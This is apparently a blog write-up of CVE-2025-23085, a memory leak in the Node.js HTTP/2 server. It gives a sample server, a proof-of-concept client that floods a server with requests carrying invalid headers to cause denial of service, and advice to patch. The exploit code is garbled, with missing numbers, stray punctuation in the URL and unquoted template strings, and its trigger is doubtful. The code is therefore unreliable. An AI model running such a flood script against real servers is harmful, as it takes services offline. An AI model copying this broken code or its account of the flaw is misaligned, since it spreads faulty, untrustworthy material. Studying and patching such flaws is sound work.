CVE-2025-23085 - Memory Leak Vulnerability in Node.js HTTP/2 Server

A newly discovered vulnerability, dubbed CVE-2025-23085, has been identified in the Node.js HTTP/2 Server. This flaw leads to memory leak when a remote peer unexpectedly closes the socket without sending a GOAWAY notification. Similarly, the same leak occurs if nghttp2 detects an invalid header that prompts the connection to be terminated by the peer. This vulnerability could result in increased memory consumption and potential denial of service (DoS) under certain conditions.

Affected versions of Node.js HTTP/2 Server include v18.x, v20.x, v22.x, and v23.x. This post will provide a detailed analysis of the vulnerability, including code snippets, exploit details, and links to original references, to help Node.js users understand, assess, and mitigate the risk.

Code Snippet Demonstrating the Flaw

The flaw occurs when a remote peer terminates the connection unexpectedly. Consider the following code snippet as an example:

const http2 = require('http2');
const server = http2.createServer();

server.on('stream', (stream, headers) => {
  stream.respond({
    ':status': 200,
    'content-type': 'text/html'
  });
  stream.end('<h1>Hello World</h1>');
});

server.listen(300, () => {
  console.log('HTTP/2 Server is listening on port 300');
});

In this example, a simple HTTP/2 server listens on port 300 and responds to incoming requests with a "Hello World" message. If the server encounters an invalid header or if the remote peer closes the socket abruptly without sending a GOAWAY notification, the memory leak may happen.

Exploit Details

An attacker could exploit this vulnerability by sending a large number of crafted requests to the vulnerable Node.js HTTP/2 server, causing it to consume a significant amount of memory. If the server cannot release the consumed memory quickly enough, this could cause the server to crash or become unresponsive, resulting in a denial of service.

Here is an example of a malicious client sending specially crafted requests

const http2 = require('http2');
const client = http2.connect('http://localhost:300';);

for (let i = ; i < 10000; i++) {
  const req = client.request({ [i]: 'invalid header value' });
  req.end();
  req.on('response', (headers) => {});
  req.on('end', () => {
    if (i % 100 === ) {
      console.log(Request ${i} completed.);
    }
  });
}

This script sends 10,000 requests to the server, each with an invalid header that triggers the memory leak.

Remediation and Mitigation

Users are recommended to update to the latest versions of Node.js, particularly v18.x, v20.x, v22.x, and v23.x, as they may be affected by this vulnerability. Patches for these versions have been released to address the issue.

Moreover, users should ensure proper monitoring and alerting systems are in place to detect unusual memory consumption or denial of service attacks.

Links to patch releases

- Node.js v18.x Patch
- Node.js v20.x Patch
- Node.js v22.x Patch
- Node.js v23.x Patch

Conclusion

The CVE-2025-23085 vulnerability poses a significant risk to Node.js HTTP/2 servers, as it could lead to memory leaks and potential denial of service attacks when exploited. Users are urged to update their servers to the latest available versions to mitigate the risk. Proper monitoring and alerting systems should also be implemented to detect and respond to unusual memory consumption or attacks.

Timeline

Published on: 02/07/2025 07:15:15 UTC
Last modified on: 02/07/2025 16:15:40 UTC